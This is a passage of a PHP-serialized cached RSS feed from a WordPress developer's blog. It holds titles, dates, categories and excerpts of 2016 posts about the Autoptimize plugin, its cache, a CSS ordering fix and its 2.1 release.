4.7";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:6;a:5:{s:4:"data";s:10:"workaround";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:30:"http://blog.futtta.be/?p=10437";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:5:"frank";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:476:"If you encountered this bug but are not using Autoptimize, leave a comment below or contact me here. Your info can help understand if the regression has an impact outside of Autoptimize as well! Gotta love Sarah, but there&#8217;s a small bug in Vaughan&#8217;s (WordPress 4.7) that breaks (part of...<br/>\n<br/>\nClick on this article&#39;s title to continue reading &gt;&gt;<img src="http://feeds.feedburner.com/~r/futtta_webtech/~4/_HuuQwRh2Bo" height="1" width="1" alt=""/>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:91:"http://blog.futtta.be/2016/12/07/wordpress-4-7-custom-background-image-bug-workaround/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:1:"5";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:42:"http://rssnamespace.org/feedburner/ext/1.0";a:1:{s:8:"origLink";a:1:{i:0;a:5:{s:4:"data";s:86:"http://blog.futtta.be/2016/12/07/wordpress-4-7-custom-background-image-bug-workaround/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:2;a:6:{s:4:"data";s:51:"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n\n		\n		\n				\n			\n		\n		";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:6:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:36:"So how does Autoptimize work anyway?";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:61:"http://feedproxy.google.com/~r/futtta_webtech/~3/v3VLBgfa58A/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:78:"http://blog.futtta.be/2016/11/09/so-how-does-autoptimize-work-anyway/#comments";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Wed, 09 Nov 2016 17:48:49 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:4:{i:0;a:5:{s:4:"data";s:11:"autoptimize";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:7:"lang:en";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:2;a:5:{s:4:"data";s:9:"wordpress";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:3;a:5:{s:4:"data";s:21:"how autoptimize works";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:30:"http://blog.futtta.be/?p=10423";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:5:"frank";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:477:"A question that has come up a couple of times already is how Autoptimize and it&#8217;s cache work. So let&#8217;s do some copy/pasting of what I replied earlier on the wordpress.org support forum; AO intercepts the HTML created by WordPress for a request (using the output buffer) all references to...<br/>\n<br/>\nClick on this article&#39;s title to continue reading &gt;&gt;<img src="http://feeds.feedburner.com/~r/futtta_webtech/~4/v3VLBgfa58A" height="1" width="1" alt=""/>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:74:"http://blog.futtta.be/2016/11/09/so-how-does-autoptimize-work-anyway/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:1:"7";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:42:"http://rssnamespace.org/feedburner/ext/1.0";a:1:{s:8:"origLink";a:1:{i:0;a:5:{s:4:"data";s:69:"http://blog.futtta.be/2016/11/09/so-how-does-autoptimize-work-anyway/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:3;a:6:{s:4:"data";s:54:"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n\n		\n		\n				\n			\n		\n		";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:6:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:45:"More than 200000 active Autoptimize installs!";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:61:"http://feedproxy.google.com/~r/futtta_webtech/~3/zirvZBKqhD4/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:82:"http://blog.futtta.be/2016/10/14/over-200000-active-autoptimize-installs/#comments";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Fri, 14 Oct 2016 07:45:43 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:5:{i:0;a:5:{s:4:"data";s:11:"autoptimize";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:9:"wordpress";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:2;a:5:{s:4:"data";s:15:"active installs";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:3;a:5:{s:4:"data";s:12:"plugin stats";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:4;a:5:{s:4:"data";s:4:"w00t";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:30:"http://blog.futtta.be/?p=10409";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:5:"frank";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:258:"Today Autoptimize officially passed the threshold of 200000 active installs. w00t!!<br/>\n<br/>\nClick on this article&#39;s title to continue reading &gt;&gt;<img src="http://feeds.feedburner.com/~r/futtta_webtech/~4/zirvZBKqhD4" height="1" width="1" alt=""/>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:78:"http://blog.futtta.be/2016/10/14/over-200000-active-autoptimize-installs/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:1:"5";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:42:"http://rssnamespace.org/feedburner/ext/1.0";a:1:{s:8:"origLink";a:1:{i:0;a:5:{s:4:"data";s:73:"http://blog.futtta.be/2016/10/14/over-200000-active-autoptimize-installs/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:4;a:6:{s:4:"data";s:63:"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n		\n		\n		\n\n		\n		\n				\n			\n		\n		";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:6:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:59:"How to fix CSS media-types impacting Autoptimized CSS order";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:61:"http://feedproxy.google.com/~r/futtta_webtech/~3/In1_tZ-xwCE/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:102:"http://blog.futtta.be/2016/10/04/how-to-fix-css-media-types-impacting-autoptimized-css-order/#comments";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Tue, 04 Oct 2016 13:05:03 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:8:{i:0;a:5:{s:4:"data";s:11:"autoptimize";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:7:"lang:en";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:2;a:5:{s:4:"data";s:11:"performance";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:3;a:5:{s:4:"data";s:9:"wordpress";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:4;a:5:{s:4:"data";s:14:"css load order";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:5;a:5:{s:4:"data";s:13:"css mediatype";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:6;a:5:{s:4:"data";s:4:"okab";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:7;a:5:{s:4:"data";s:9:"pixeldima";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:30:"http://blog.futtta.be/?p=10394";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:5:"frank";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:475:"Adel of Pixeldima contacted me to look into a problem with some of the styles not being applied after autoptimization on the forum-page in his beautiful OKAB-theme. I had seen similar problems before, but decided to dig in this time to understand the root cause. That root cause turned out to be 2...<br/>\n<br/>\nClick on this article&#39;s title to continue reading &gt;&gt;<img src="http://feeds.feedburner.com/~r/futtta_webtech/~4/In1_tZ-xwCE" height="1" width="1" alt=""/>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:98:"http://blog.futtta.be/2016/10/04/how-to-fix-css-media-types-impacting-autoptimized-css-order/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:1:"2";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:42:"http://rssnamespace.org/feedburner/ext/1.0";a:1:{s:8:"origLink";a:1:{i:0;a:5:{s:4:"data";s:93:"http://blog.futtta.be/2016/10/04/how-to-fix-css-media-types-impacting-autoptimized-css-order/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:5;a:6:{s:4:"data";s:69:"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n		\n		\n		\n		\n		\n\n		\n		\n				\n			\n		\n		";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:6:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:51:"Autoptimize cache size: the canary in the coal mine";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:61:"http://feedproxy.google.com/~r/futtta_webtech/~3/NcmcF0UfG5s/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:93:"http://blog.futtta.be/2016/09/15/autoptimize-cache-size-the-canary-in-the-coal-mine/#comments";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Thu, 15 Sep 2016 16:11:59 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:10:{i:0;a:5:{s:4:"data";s:11:"autoptimize";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:7:"lang:en";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:2;a:5:{s:4:"data";s:13:"rants & raves";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:3;a:5:{s:4:"data";s:9:"wordpress";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:4;a:5:{s:4:"data";s:5:"alert";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:5;a:5:{s:4:"data";s:10:"auto-purge";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:6;a:5:{s:4:"data";s:5:"cache";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:7;a:5:{s:4:"data";s:10:"cache size";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:8;a:5:{s:4:"data";s:4:"cron";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:9;a:5:{s:4:"data";s:11:"performance";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:30:"http://blog.futtta.be/?p=10386";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:5:"frank";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:475:"Copy/ pasted straight from a support question on wordpress.org; Auto-deleting the cache would only solve one problem you&#8217;re having (disk space), but there are 2 other problems -which I consider more important- that auto-cleaning can never solve: 1. you will be generating new autoptimized JS...<br/>\n<br/>\nClick on this article&#39;s title to continue reading &gt;&gt;<img src="http://feeds.feedburner.com/~r/futtta_webtech/~4/NcmcF0UfG5s" height="1" width="1" alt=""/>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:89:"http://blog.futtta.be/2016/09/15/autoptimize-cache-size-the-canary-in-the-coal-mine/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:2:"10";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:42:"http://rssnamespace.org/feedburner/ext/1.0";a:1:{s:8:"origLink";a:1:{i:0;a:5:{s:4:"data";s:84:"http://blog.futtta.be/2016/09/15/autoptimize-cache-size-the-canary-in-the-coal-mine/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:6;a:6:{s:4:"data";s:60:"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n		\n		\n\n		\n		\n				\n			\n		\n		";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:6:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:43:"Autoptimize 2.1 and first Power-Up released";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:61:"http://feedproxy.google.com/~r/futtta_webtech/~3/tUrnEBFcTw4/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:86:"http://blog.futtta.be/2016/09/04/autoptimize-2-1-and-first-power-up-released/#comments";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Sun, 04 Sep 2016 06:10:42 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:7:{i:0;a:5:{s:4:"data";s:11:"autoptimize";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:7:"lang:en";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:2;a:5:{s:4:"data";s:18:"optimizing matters";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:3;a:5:{s:4:"data";s:15:"active installs";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:4;a:5:{s:4:"data";s:24:"autoptimize critical css";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:5;a:5:{s:4:"data";s:8:"power-up";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:6;a:5:{s:4:"data";s:7:"release";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:30:"http://blog.futtta.be/?p=10382";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:5:"frank";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:474:"Yesterday evening I released Autoptimize 2.1 and the first Power-Up to manage critical CSS has been made available as a optional service over at criticalcss.com. This short video explains some of the logic behind the Autoptimize Critical CSS Power-Up: But let&#8217;s not forget about Autoptimize...<br/>\n<br/>\nClick on this article&#39;s title to continue reading &gt;&gt;<img src="http://feeds.feedburner.com/~r/futtta_webtech/~4/tUrnEBFcTw4" height="1" width="1" alt=""/>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:82:"http://blog.futtta.be/2016/09/04/autoptimize-2-1-and-first-power-up-released/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:2:"10";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:42:"http://rssnamespace.org/feedburner/ext/1.0";a:1:{s:8:"origLink";a:1:{i:0;a:5:{s:4:"data";s:77:"http://blog.futtta.be/2016/09/04/autoptimize-2-1-and-first-power-up-released/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:7;a:6:{s:4:"data";s:69:"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n		\n		\n		\n		\n		\n\n		\n		\n				\n			\n		\n		";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:6:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:23:"Almost time to announce";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:61:"http://feedproxy.google.com/~r/futtta_webtech/~3/e9COTtG7a6o/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:65:"http://blog.futtta.be/2016/09/02/almost-time-to-announce/#respond";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Fri, 02 Sep 2016 05:12:22 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:10:{i:0;a:5:{s:4:"data";s:11:"autoptimize";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:7:"lang:en";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:2;a:5:{s:4:"data";s:18:"optimizing matters";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:3;a:5:{s:4:"data";s:11:"performance";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:4;a:5:{s:4:"data";s:9:"wordpress";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:5;a:5:{s:4:"data";s:24:"autoptimize critical css";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:6;a:5:{s:4:"data";s:20:"autoptimize power-up";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:7;a:5:{s:4:"data";s:15:"criticalcss.com";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:8;a:5:{s:4:"data";s:13:"jonas 